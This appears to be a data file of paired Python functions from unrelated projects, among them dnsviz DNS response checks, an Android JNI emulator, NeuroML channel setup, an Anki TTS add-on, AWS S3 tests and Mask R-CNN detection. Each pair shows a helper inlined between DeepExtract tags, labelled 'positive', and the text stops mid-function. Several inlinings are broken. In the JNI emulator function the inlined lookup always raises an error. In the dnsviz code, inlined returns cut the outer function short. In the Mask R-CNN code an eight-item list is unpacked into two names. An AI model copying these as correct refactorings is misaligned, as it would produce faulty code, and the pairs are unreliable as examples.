Errors.DomainNameAnalysisError.insert_into_list(Errors.CasePreservationError(qname=fmt.humanize_name(query.qname, canonicalize=False)), self.response_warnings[query], server, client, response)
</DeepExtract>
|
def _populate_invalid_response_status(self, query):
self.response_errors[query] = []
for error_info in query.error_info:
for (server, client) in error_info.servers_clients:
for response in error_info.servers_clients[server, client]:
if error_info.code == Q.RESPONSE_ERROR_NETWORK_ERROR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NetworkError(tcp=response.effective_tcp, errno=errno.errorcode.get(error_info.arg, 'UNKNOWN')), self.response_errors[query], server, client, response)
if error_info.code == Q.RESPONSE_ERROR_FORMERR:
Errors.DomainNameAnalysisError.insert_into_list(Errors.FormError(tcp=response.effective_tcp, msg_size=response.msg_size), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_TIMEOUT:
attempts = 1
for i in range(len(response.history) - 1, -1, -1):
if response.history[i].action in (Q.RETRY_ACTION_USE_TCP, Q.RETRY_ACTION_USE_UDP):
break
attempts += 1
Errors.DomainNameAnalysisError.insert_into_list(Errors.Timeout(tcp=response.effective_tcp, attempts=attempts), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_INVALID_RCODE:
if response.effective_edns >= 0 and response.message.edns < 0 and (response.message.rcode() in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP)):
pass
elif response.effective_edns >= 0 and response.message.edns >= 0 and (response.message.rcode() == dns.rcode.BADVERS):
pass
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.InvalidRcode(tcp=response.effective_tcp, rcode=dns.rcode.to_text(response.message.rcode())), self.response_errors[query], server, client, response)
elif error_info.code == Q.RESPONSE_ERROR_OTHER:
Errors.DomainNameAnalysisError.insert_into_list(Errors.UnknownResponseError(tcp=response.effective_tcp), self.response_errors[query], server, client, response)
self.response_warnings[query] = []
for referral_info in query.referral_info:
for (server, client) in referral_info.servers_clients:
for response in referral_info.servers_clients[server, client]:
if response.is_authoritative():
Errors.DomainNameAnalysisError.insert_into_list(Errors.AuthoritativeReferral(), self.response_warnings[query], server, client, response)
for truncated_info in query.truncated_info:
for (server, client) in truncated_info.servers_clients:
for response in truncated_info.servers_clients[server, client]:
change_err = None
if response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
cause_err_class = None
action_err_class = None
cause_err_kwargs = {'tcp': response.responsive_cause_index_tcp}
action_err_kwargs = {}
require_valid = False
dnssec_downgrade_class = None
if retry.cause == Q.RETRY_CAUSE_NETWORK_ERROR:
cause_err_class = Errors.NetworkError
cause_err_kwargs['errno'] = errno.errorcode.get(retry.cause_arg, 'UNKNOWN')
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_FORMERR:
cause_err_class = Errors.FormError
cause_err_kwargs['msg_size'] = response.msg_size
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_TIMEOUT:
cause_err_class = Errors.Timeout
cause_err_kwargs['attempts'] = response.responsive_cause_index + 1
require_valid = False
elif retry.cause == Q.RETRY_CAUSE_RCODE:
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and self is not None and self.zone.signed:
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
if retry.cause_arg in (dns.rcode.FORMERR, dns.rcode.SERVFAIL, dns.rcode.NOTIMP) and retry.action == Q.RETRY_ACTION_DISABLE_EDNS and (not (self is not None and self.zone.signed)):
pass
elif retry.cause_arg == dns.rcode.BADVERS and retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
pass
elif retry.cause_arg == dns.rcode.SERVFAIL and retry.action == Q.RETRY_ACTION_SET_FLAG and (retry.action_arg == dns.flags.CD):
pass
elif retry.cause_arg == 23 and response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD) and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
pass
if retry.cause_arg == dns.rcode.FORMERR and response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
pass
else:
cause_err_class = Errors.InvalidRcode
cause_err_kwargs['rcode'] = dns.rcode.to_text(retry.cause_arg)
require_valid = True
elif retry.cause == Q.RETRY_CAUSE_OTHER:
require_valid = True
action_arg = retry.action_arg
if retry.action == Q.RETRY_ACTION_NO_CHANGE:
pass
elif retry.action == Q.RETRY_ACTION_CHANGE_SPORT:
pass
elif retry.action == Q.RETRY_ACTION_SET_FLAG:
action_err_class = Errors.ResponseErrorWithoutRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_FLAG:
action_err_class = Errors.ResponseErrorWithRequestFlag
action_err_kwargs['flag'] = dns.flags.to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_DISABLE_EDNS:
action_err_class = Errors.ResponseErrorWithEDNS
dnssec_downgrade_class = Errors.DNSSECDowngradeEDNSDisabled
elif retry.action == Q.RETRY_ACTION_CHANGE_UDP_MAX_PAYLOAD:
action_err_class = Errors.PMTUExceeded
action_err_kwargs['pmtu_lower_bound'] = None
action_err_kwargs['pmtu_upper_bound'] = None
elif retry.action == Q.RETRY_ACTION_SET_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithoutEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
elif retry.action == Q.RETRY_ACTION_CLEAR_EDNS_FLAG:
action_err_class = Errors.ResponseErrorWithEDNSFlag
action_err_kwargs['flag'] = dns.flags.edns_to_text(retry.action_arg)
if not action_err_kwargs['flag']:
action_err_kwargs['flag'] = retry.action_arg
if retry.action_arg == dns.flags.DO:
dnssec_downgrade_class = Errors.DNSSECDowngradeDOBitCleared
elif retry.action == Q.RETRY_ACTION_ADD_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithoutEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION:
action_err_class = Errors.ResponseErrorWithEDNSOption
action_err_kwargs['option'] = fmt.EDNS_OPT_DESCRIPTIONS.get(retry.action_arg, retry.action_arg)
elif retry.action == Q.RETRY_ACTION_CHANGE_EDNS_VERSION:
action_err_class = Errors.ResponseErrorWithEDNSVersion
action_err_kwargs['edns_old'] = response.query.edns
action_err_kwargs['edns_new'] = retry.action_arg
action_arg = response.query.edns
if cause_err_class is not None and action_err_class is not None:
if self is not None and self.zone.server_responsive_for_action(server, client, response.responsive_cause_index_tcp, retry.action, action_arg, require_valid):
query_specific = True
else:
query_specific = False
cause_err = cause_err_class(**cause_err_kwargs)
change_err = action_err_class(response_error=cause_err, query_specific=query_specific, **action_err_kwargs)
if change_err is not None:
if dnssec_downgrade_class is not None and self is not None and self.zone.signed:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_errors[query], server, client, response)
Errors.DomainNameAnalysisError.insert_into_list(dnssec_downgrade_class(response_error=cause_err), self.response_errors[query], server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(change_err, self.response_warnings[query], server, client, response)
query = response.query
if self is not None:
if response.is_complete_response():
group = self.response_errors[query]
else:
group = self.response_warnings[query]
if self.analysis_type == ANALYSIS_TYPE_AUTHORITATIVE:
if not response.is_authoritative():
ds_referral = False
mygrp = group
if query.rdtype == dns.rdatatype.DS:
if not self.zone.signed:
mygrp = self.response_warnings[query]
if response.is_referral(query.qname, query.rdtype, query.rdclass, self.name):
ds_referral = True
if ds_referral:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ReferralForDSQuery(parent=fmt.humanize_name(self.name)), mygrp, server, client, response)
else:
Errors.DomainNameAnalysisError.insert_into_list(Errors.NotAuthoritative(), mygrp, server, client, response)
elif self.analysis_type == ANALYSIS_TYPE_RECURSIVE:
if response.recursion_desired() and (not response.recursion_available()):
Errors.DomainNameAnalysisError.insert_into_list(Errors.RecursionNotAvailable(), group, server, client, response)
if response.is_complete_response() and response.message.rcode() == dns.rcode.NOERROR and (self.nxdomain_ancestor is not None):
Errors.DomainNameAnalysisError.insert_into_list(Errors.InconsistentNXDOMAINAncestry(qname=fmt.humanize_name(response.query.qname), ancestor_qname=fmt.humanize_name(self.nxdomain_ancestor.name)), self.response_errors[query], server, client, response)
if response.message is None:
return
edns_errs = []
if response.effective_edns >= 0:
if response.message.edns < 0:
if [x for x in response.message.answer if x.rdtype == dns.rdatatype.RRSIG]:
edns_errs.append(Errors.EDNSSupportNoOpt())
else:
edns_errs.append(Errors.EDNSIgnored())
else:
if response.message.rcode() == dns.rcode.BADVERS:
if response.message.edns >= response.effective_edns:
edns_errs.append(Errors.ImplementedEDNSVersionNotProvided(request_version=response.effective_edns, response_version=response.message.edns))
elif response.message.edns != response.effective_edns:
edns_errs.append(Errors.EDNSVersionMismatch(request_version=response.effective_edns, response_version=response.message.edns))
undefined_edns_flags_set = response.message.ednsflags & 65535 & ~EDNS_DEFINED_FLAGS
if undefined_edns_flags_set:
edns_errs.append(Errors.EDNSUndefinedFlagsSet(flags=undefined_edns_flags_set))
elif response.message.edns >= 0:
edns_errs.append(Errors.GratuitousOPT())
for edns_err in edns_errs:
Errors.DomainNameAnalysisError.insert_into_list(edns_err, self.response_warnings[query], server, client, response)
if response.message is None:
return
cookie_errs = []
try:
cookie_opt = [o for o in response.effective_edns_options if o.otype == 10][0]
except IndexError:
cookie_opt = None
try:
cookie_opt_from_server = [o for o in response.message.options if o.otype == 10][0]
except IndexError:
cookie_opt_from_server = None
supports_cookies = self is not None and server in self.cookie_jar
if response.query.edns < 0 or cookie_opt is None:
if cookie_opt_from_server is not None:
cookie_errs.append(Errors.GratuitousCookie())
elif supports_cookies:
if response.server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
issued_formerr = False
if response.effective_server_cookie_status == Q.DNS_COOKIE_IMPROPER_LENGTH:
if response.message.rcode() == dns.rcode.FORMERR:
issued_formerr = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == dns.rcode.FORMERR and (retry.action == Q.RETRY_ACTION_DISABLE_EDNS or (retry.action == Q.RETRY_ACTION_REMOVE_EDNS_OPTION and retry.action_arg == 10)):
issued_formerr = True
if not issued_formerr:
cookie_errs.append(Errors.MalformedCookieWithoutFORMERR())
if response.server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if response.server_cookie_status == Q.DNS_COOKIE_CLIENT_COOKIE_ONLY:
err_cls = Errors.NoServerCookieWithoutBADCOOKIE
else:
err_cls = Errors.InvalidServerCookieWithoutBADCOOKIE
issued_badcookie = False
if response.effective_server_cookie_status in (Q.DNS_COOKIE_CLIENT_COOKIE_ONLY, Q.DNS_COOKIE_SERVER_COOKIE_BAD):
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if response.message.rcode() == 23:
issued_badcookie = True
elif response.responsive_cause_index is not None:
retry = response.history[response.responsive_cause_index]
if retry.cause == Q.RETRY_CAUSE_RCODE and retry.cause_arg == 23 and (retry.action == Q.RETRY_ACTION_UPDATE_DNS_COOKIE):
issued_badcookie = True
if self._strict_cookies and (not issued_badcookie):
cookie_errs.append(err_cls())
if response.effective_server_cookie_status == Q.DNS_COOKIE_SERVER_COOKIE_FRESH:
if cookie_opt_from_server is None:
cookie_errs.append(Errors.NoCookieOption())
elif len(cookie_opt_from_server.data) == 8:
cookie_errs.append(Errors.NoServerCookie())
if cookie_opt is not None and cookie_opt_from_server is not None:
if len(cookie_opt_from_server.data) >= 8 and cookie_opt_from_server.data[:8] != cookie_opt.data[:8]:
cookie_errs.append(Errors.ClientCookieMismatch())
if len(cookie_opt_from_server.data) < 8 or len(cookie_opt_from_server.data) > 40:
cookie_errs.append(Errors.CookieInvalidLength(length=len(cookie_opt_from_server.data)))
for cookie_err in cookie_errs:
Errors.DomainNameAnalysisError.insert_into_list(cookie_err, self.response_warnings[query], server, client, response)
query = response.query
cls = query.rdclass
if response.message is None:
return
ans_cls = [r.rdclass for r in response.message.answer if r.rdclass != cls]
auth_cls = [r.rdclass for r in response.message.authority if r.rdclass != cls]
add_cls = [r.rdclass for r in response.message.additional if r.rdclass != cls and r.rdtype != dns.rdatatype.SIG]
if ans_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAnswer(cls=dns.rdataclass.to_text(ans_cls[0])), self.response_warnings[query], server, client, response)
if auth_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAuthority(cls=dns.rdataclass.to_text(auth_cls[0])), self.response_warnings[query], server, client, response)
if add_cls:
Errors.DomainNameAnalysisError.insert_into_list(Errors.ForeignClassDataAdditional(cls=dns.rdataclass.to_text(add_cls[0])), self.response_warnings[query], server, client, response)
query = response.query
msg = response.message
if msg.question and query.qname.to_text() != msg.question[0].name.to_text():
Errors.DomainNameAnalysisError.insert_into_list(Errors.CasePreservationError(qname=fmt.humanize_name(query.qname, canonicalize=False)), self.response_warnings[query], server, client, response)
</DeepExtract>
|
dnsviz
|
positive
|
@native_method
def get_static_object_field(self, uc, env, clazz_idx, field_id):
logger.debug('JNIEnv->GetStaticObjectField(%d, %d) was called' % (clazz_idx, field_id))
<DeepExtract>
if clazz_idx == 0:
clazz = None
if self._locals.in_range(clazz_idx):
clazz = self._locals.get(clazz_idx)
if self._globals.in_range(clazz_idx):
clazz = self._globals.get(clazz_idx)
raise RuntimeError('Invalid get_reference(%d)' % clazz_idx)
</DeepExtract>
field = clazz.value.find_field_by_id(field_id)
return field.static_value
|
@native_method
def get_static_object_field(self, uc, env, clazz_idx, field_id):
logger.debug('JNIEnv->GetStaticObjectField(%d, %d) was called' % (clazz_idx, field_id))
if clazz_idx == 0:
clazz = None
if self._locals.in_range(clazz_idx):
clazz = self._locals.get(clazz_idx)
if self._globals.in_range(clazz_idx):
clazz = self._globals.get(clazz_idx)
raise RuntimeError('Invalid get_reference(%d)' % clazz_idx)
field = clazz.value.find_field_by_id(field_id)
return field.static_value
|
AndroidNativeEmu
|
positive
|
def get_arguments(params, parameter_name, section_list, channel, channel_name, variable_parameters, cond_density, release_params, custom_channel_ion=None, custom_ion_erevs=None):
"""Get arguments for channel density function.
Arguments:
params (dict): contains the cell's parameters
parameter_name (str): name of the parameter (e.g. e_pas)
section_list (str): name of the location of the parameter (e.g. axonal)
channel (str): ion channel (e.g. StochKv)
channel_name (str): ion channel name used in the neuroML channel file
(e.g. StochKv_deterministic)
variable_parameters (list of neuroml.VariableParameter):
parameters for non-uniform distributions
cond_density (str): conductance density
release_params (dict): optimized parameters
custom_channel_ion (dict): dict mapping channel to ion
custom_ion_erevs (dict): dict mapping ion to erev (reversal potential)
"""
arguments = {}
<DeepExtract>
ion = channel_ions.get(channel, None)
if ion is None and custom_channel_ion is not None:
ion = custom_channel_ion.get(channel, None)
if ion is None:
raise KeyError(f'Ion not found for channel {channel}. Please set channel-ion mapping using custom_channel_ion.')
arguments['ion'] = ion
</DeepExtract>
<DeepExtract>
erev = ion_erevs.get(arguments['ion'], None)
if erev is None and custom_ion_erevs is not None:
erev = custom_ion_erevs.get(arguments['ion'], None)
if erev is None:
raise KeyError(f"Reversal potential not found for ion {arguments['ion']}. Please set ion-erev mapping using custom_ion_erevs.")
erev = erev
</DeepExtract>
channel_class = 'ChannelDensity'
if erev == 'nernst':
erev = None
channel_class = 'ChannelDensityNernst'
elif erev == 'pas':
erev = params[f'e_pas.{section_list}'].value
if erev is None:
erev = release_params[f'e_pas.{section_list}']
erev = f'{erev} mV'
arguments['ion'] = 'non_specific'
if variable_parameters is not None:
channel_class += 'NonUniform'
else:
arguments['segment_groups'] = section_list
if erev is not None:
arguments['erev'] = erev
arguments['id'] = f'{section_list}_{parameter_name}'
if cond_density is not None:
arguments['cond_density'] = cond_density
arguments['ion_channel'] = channel_name
if variable_parameters is not None:
arguments['variable_parameters'] = variable_parameters
return (arguments, channel_class)
|
def get_arguments(params, parameter_name, section_list, channel, channel_name, variable_parameters, cond_density, release_params, custom_channel_ion=None, custom_ion_erevs=None):
"""Get arguments for channel density function.
Arguments:
params (dict): contains the cell's parameters
parameter_name (str): name of the parameter (e.g. e_pas)
section_list (str): name of the location of the parameter (e.g. axonal)
channel (str): ion channel (e.g. StochKv)
channel_name (str): ion channel name used in the neuroML channel file
(e.g. StochKv_deterministic)
variable_parameters (list of neuroml.VariableParameter):
parameters for non-uniform distributions
cond_density (str): conductance density
release_params (dict): optimized parameters
custom_channel_ion (dict): dict mapping channel to ion
custom_ion_erevs (dict): dict mapping ion to erev (reversal potential)
"""
arguments = {}
ion = channel_ions.get(channel, None)
if ion is None and custom_channel_ion is not None:
ion = custom_channel_ion.get(channel, None)
if ion is None:
raise KeyError(f'Ion not found for channel {channel}. Please set channel-ion mapping using custom_channel_ion.')
arguments['ion'] = ion
erev = ion_erevs.get(arguments['ion'], None)
if erev is None and custom_ion_erevs is not None:
erev = custom_ion_erevs.get(arguments['ion'], None)
if erev is None:
raise KeyError(f"Reversal potential not found for ion {arguments['ion']}. Please set ion-erev mapping using custom_ion_erevs.")
erev = erev
channel_class = 'ChannelDensity'
if erev == 'nernst':
erev = None
channel_class = 'ChannelDensityNernst'
elif erev == 'pas':
erev = params[f'e_pas.{section_list}'].value
if erev is None:
erev = release_params[f'e_pas.{section_list}']
erev = f'{erev} mV'
arguments['ion'] = 'non_specific'
if variable_parameters is not None:
channel_class += 'NonUniform'
else:
arguments['segment_groups'] = section_list
if erev is not None:
arguments['erev'] = erev
arguments['id'] = f'{section_list}_{parameter_name}'
if cond_density is not None:
arguments['cond_density'] = cond_density
arguments['ion_channel'] = channel_name
if variable_parameters is not None:
arguments['variable_parameters'] = variable_parameters
return (arguments, channel_class)
|
BluePyOpt
|
positive
|
def _get_all(self):
"""
Returns a dict of the options that need to be updated to
remember and process the state of the form.
"""
<DeepExtract>
dropdown = self.findChild(aqt.qt.QComboBox, 'service')
idx = dropdown.currentIndex()
svc_id = dropdown.itemData(idx)
if svc_id.startswith('group:'):
(svc_id, values) = (svc_id, None)
vinputs = self.findChild(aqt.qt.QStackedWidget, 'panels').widget(idx).findChildren(self._OPTIONS_WIDGETS)
options = self._addon.router.get_options(svc_id)
assert len(options) == len(vinputs)
(svc_id, values) = (svc_id, {options[i]['key']: vinputs[i].value() if isinstance(vinputs[i], aqt.qt.QDoubleSpinBox) or isinstance(vinputs[i], aqt.qt.QSpinBox) else vinputs[i].itemData(vinputs[i].currentIndex()) for i in range(len(options))})
</DeepExtract>
return {'last_service': svc_id, 'last_options': {**self._addon.config['last_options'], **{svc_id: values}}} if values else dict(last_service=svc_id)
|
def _get_all(self):
"""
Returns a dict of the options that need to be updated to
remember and process the state of the form.
"""
dropdown = self.findChild(aqt.qt.QComboBox, 'service')
idx = dropdown.currentIndex()
svc_id = dropdown.itemData(idx)
if svc_id.startswith('group:'):
(svc_id, values) = (svc_id, None)
vinputs = self.findChild(aqt.qt.QStackedWidget, 'panels').widget(idx).findChildren(self._OPTIONS_WIDGETS)
options = self._addon.router.get_options(svc_id)
assert len(options) == len(vinputs)
(svc_id, values) = (svc_id, {options[i]['key']: vinputs[i].value() if isinstance(vinputs[i], aqt.qt.QDoubleSpinBox) or isinstance(vinputs[i], aqt.qt.QSpinBox) else vinputs[i].itemData(vinputs[i].currentIndex()) for i in range(len(options))})
return {'last_service': svc_id, 'last_options': {**self._addon.config['last_options'], **{svc_id: values}}} if values else dict(last_service=svc_id)
|
awesometts-anki-addon
|
positive
|
def _test_s3_put_get_object(self, request, request_type, exception_name=None):
<DeepExtract>
event_loop_group = EventLoopGroup()
host_resolver = DefaultHostResolver(event_loop_group)
bootstrap = ClientBootstrap(event_loop_group, host_resolver)
credential_provider = AwsCredentialsProvider.new_default_chain(bootstrap)
tls_option = None
if False:
opt = TlsContextOptions()
ctx = ClientTlsContext(opt)
tls_option = TlsConnectionOptions(ctx)
s3_client = S3Client(bootstrap=bootstrap, region=self.region, credential_provider=credential_provider, tls_connection_options=tls_option, part_size=5 * MB)
s3_client = s3_client
</DeepExtract>
s3_request = s3_client.make_request(request=request, type=request_type, on_headers=self._on_request_headers, on_body=self._on_request_body)
finished_future = s3_request.finished_future
try:
finished_future.result(self.timeout)
except Exception as e:
self.assertEqual(e.name, exception_name)
else:
<DeepExtract>
self.assertEqual(self.response_status_code, 200, 'status code is not 200')
headers = HttpHeaders(self.response_headers)
self.assertIsNone(headers.get('Content-Range'))
body_length = headers.get('Content-Length')
if not request_type is S3RequestType.PUT_OBJECT:
self.assertIsNotNone(body_length, 'Content-Length is missing from headers')
if body_length:
self.assertEqual(int(body_length), self.received_body_len, 'Received body length does not match the Content-Length header')
</DeepExtract>
shutdown_event = s3_request.shutdown_event
s3_request = None
self.assertTrue(shutdown_event.wait(self.timeout))
|
def _test_s3_put_get_object(self, request, request_type, exception_name=None):
event_loop_group = EventLoopGroup()
host_resolver = DefaultHostResolver(event_loop_group)
bootstrap = ClientBootstrap(event_loop_group, host_resolver)
credential_provider = AwsCredentialsProvider.new_default_chain(bootstrap)
tls_option = None
if False:
opt = TlsContextOptions()
ctx = ClientTlsContext(opt)
tls_option = TlsConnectionOptions(ctx)
s3_client = S3Client(bootstrap=bootstrap, region=self.region, credential_provider=credential_provider, tls_connection_options=tls_option, part_size=5 * MB)
s3_client = s3_client
s3_request = s3_client.make_request(request=request, type=request_type, on_headers=self._on_request_headers, on_body=self._on_request_body)
finished_future = s3_request.finished_future
try:
finished_future.result(self.timeout)
except Exception as e:
self.assertEqual(e.name, exception_name)
else:
self.assertEqual(self.response_status_code, 200, 'status code is not 200')
headers = HttpHeaders(self.response_headers)
self.assertIsNone(headers.get('Content-Range'))
body_length = headers.get('Content-Length')
if not request_type is S3RequestType.PUT_OBJECT:
self.assertIsNotNone(body_length, 'Content-Length is missing from headers')
if body_length:
self.assertEqual(int(body_length), self.received_body_len, 'Received body length does not match the Content-Length header')
shutdown_event = s3_request.shutdown_event
s3_request = None
self.assertTrue(shutdown_event.wait(self.timeout))
|
aws-crt-python
|
positive
|
def detect(self, images):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
<DeepExtract>
molded_images = []
image_metas = []
windows = []
for image in images:
(molded_image, window, scale, padding) = utils.resize_image(image, min_dim=self.config.IMAGE_MIN_DIM, max_dim=self.config.IMAGE_MAX_DIM, padding=self.config.IMAGE_PADDING)
molded_image = mold_image(molded_image, self.config)
image_meta = compose_image_meta(0, image.shape, window, np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
(molded_images, image_metas, windows) = (molded_images, image_metas, windows)
</DeepExtract>
molded_images = torch.from_numpy(molded_images.transpose(0, 3, 1, 2)).float()
if self.config.GPU_COUNT:
molded_images = molded_images.cuda()
molded_images = Variable(molded_images, volatile=True)
<DeepExtract>
molded_images = [molded_images, image_metas][0]
image_metas = [molded_images, image_metas][1]
if 'inference' == 'inference':
self.eval()
elif 'inference' == 'training':
self.train()
def set_bn_eval(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
self.apply(set_bn_eval)
[p2_out, p3_out, p4_out, p5_out, p6_out] = self.fpn(molded_images)
rpn_feature_maps = [p2_out, p3_out, p4_out, p5_out, p6_out]
mrcnn_feature_maps = [p2_out, p3_out, p4_out, p5_out]
layer_outputs = []
for p in rpn_feature_maps:
layer_outputs.append(self.rpn(p))
outputs = list(zip(*layer_outputs))
outputs = [torch.cat(list(o), dim=1) for o in outputs]
(rpn_class_logits, rpn_class, rpn_bbox) = outputs
proposal_count = self.config.POST_NMS_ROIS_TRAINING if 'inference' == 'training' else self.config.POST_NMS_ROIS_INFERENCE
rpn_rois = proposal_layer([rpn_class, rpn_bbox], proposal_count=proposal_count, nms_threshold=self.config.RPN_NMS_THRESHOLD, anchors=self.anchors, config=self.config)
if 'inference' == 'inference':
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rpn_rois)
detections = detection_layer(self.config, rpn_rois, mrcnn_class, mrcnn_bbox, image_metas)
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
detection_boxes = detections[:, :4] / scale
detection_boxes = detection_boxes.unsqueeze(0)
mrcnn_mask = self.mask(mrcnn_feature_maps, detection_boxes)
detections = detections.unsqueeze(0)
mrcnn_mask = mrcnn_mask.unsqueeze(0)
(detections, mrcnn_mask) = [detections, mrcnn_mask]
elif 'inference' == 'training':
gt_class_ids = [molded_images, image_metas][2]
gt_boxes = [molded_images, image_metas][3]
gt_masks = [molded_images, image_metas][4]
(h, w) = self.config.IMAGE_SHAPE[:2]
scale = Variable(torch.from_numpy(np.array([h, w, h, w])).float(), requires_grad=False)
if self.config.GPU_COUNT:
scale = scale.cuda()
gt_boxes = gt_boxes / scale
(rois, target_class_ids, target_deltas, target_mask) = detection_target_layer(rpn_rois, gt_class_ids, gt_boxes, gt_masks, self.config)
if not rois.size():
mrcnn_class_logits = Variable(torch.FloatTensor())
mrcnn_class = Variable(torch.IntTensor())
mrcnn_bbox = Variable(torch.FloatTensor())
mrcnn_mask = Variable(torch.FloatTensor())
if self.config.GPU_COUNT:
mrcnn_class_logits = mrcnn_class_logits.cuda()
mrcnn_class = mrcnn_class.cuda()
mrcnn_bbox = mrcnn_bbox.cuda()
mrcnn_mask = mrcnn_mask.cuda()
else:
(mrcnn_class_logits, mrcnn_class, mrcnn_bbox) = self.classifier(mrcnn_feature_maps, rois)
mrcnn_mask = self.mask(mrcnn_feature_maps, rois)
(detections, mrcnn_mask) = [rpn_class_logits, rpn_bbox, target_class_ids, mrcnn_class_logits, target_deltas, mrcnn_bbox, target_mask, mrcnn_mask]
</DeepExtract>
detections = detections.data.cpu().numpy()
mrcnn_mask = mrcnn_mask.permute(0, 1, 3, 4, 2).data.cpu().numpy()
results = []
for (i, image) in enumerate(images):
<DeepExtract>
zero_ix = np.where(detections[i][:, 4] == 0)[0]
N = zero_ix[0] if zero_ix.shape[0] > 0 else detections[i].shape[0]
boxes = detections[i][:N, :4]
class_ids = detections[i][:N, 4].astype(np.int32)
scores = detections[i][:N, 5]
masks = mrcnn_mask[i][np.arange(N), :, :, class_ids]
h_scale = image.shape[0] / (windows[i][2] - windows[i][0])
w_scale = image.shape[1] / (windows[i][3] - windows[i][1])
scale = min(h_scale, w_scale)
shift = windows[i][:2]
scales = np.array([scale, scale, scale, scale])
shifts = np.array([shift[0], shift[1], shift[0], shift[1]])
boxes = np.multiply(boxes - shifts, scales).astype(np.int32)
exclude_ix = np.where((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]) <= 0)[0]
if exclude_ix.shape[0] > 0:
boxes = np.delete(boxes, exclude_ix, axis=0)
class_ids = np.delete(class_ids, exclude_ix, axis=0)
scores = np.delete(scores, exclude_ix, axis=0)
masks = np.delete(masks, exclude_ix, axis=0)
N = class_ids.shape[0]
full_masks = []
for i in range(N):
full_mask = utils.unmold_mask(masks[i], boxes[i], image.shape)
full_masks.append(full_mask)
full_masks = np.stack(full_masks, axis=-1) if full_masks else np.empty((0,) + masks.shape[1:3])
(final_rois, final_class_ids, final_scores, final_masks) = (boxes, class_ids, scores, full_masks)
</DeepExtract>
results.append({'rois': final_rois, 'class_ids': final_class_ids, 'scores': final_scores, 'masks': final_masks})
return results
|
def detect(self, images):
"""Runs the detection pipeline.
images: List of images, potentially of different sizes.
Returns a list of dicts, one dict per image. The dict contains:
rois: [N, (y1, x1, y2, x2)] detection bounding boxes
class_ids: [N] int class IDs
scores: [N] float probability scores for the class IDs
masks: [H, W, N] instance binary masks
"""
molded_images = []
image_metas = []
windows = []
for image in images:
(molded_image, window, scale, padding) = utils.resize_image(image, min_dim=self.config.IMAGE_MIN_DIM, max_dim=self.config.IMAGE_MAX_DIM, padding=self.config.IMAGE_PADDING)
molded_image = mold_image(molded_image, self.config)
image_meta = compose_image_meta(0, image.shape, window, np.zeros([self.config.NUM_CLASSES], dtype=np.int32))
molded_images.append(molded_image)
windows.append(window)
image_metas.append(image_meta)
molded_images = np.stack(molded_images)
image_metas = np.stack(image_metas)
windows = np.stack(windows)
(molded_images, image_metas, windows) = (molded_images, image_metas, windows)
molded_images = torch.from_numpy(molded_images.transpose(0, 3, 1, 2)).float()
if self.config.GPU_COUNT:
molded_images = molded_images.cuda()
molded_images = Variable(molded_images, volatile=True)
molded_images = [molded_images, image_metas][0]
image_metas = [molded_images, image_metas][1]
if 'inference' == 'inference':
self.eval()
elif 'inference' == 'training':
self.train()
def set_bn_eval(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.eval()
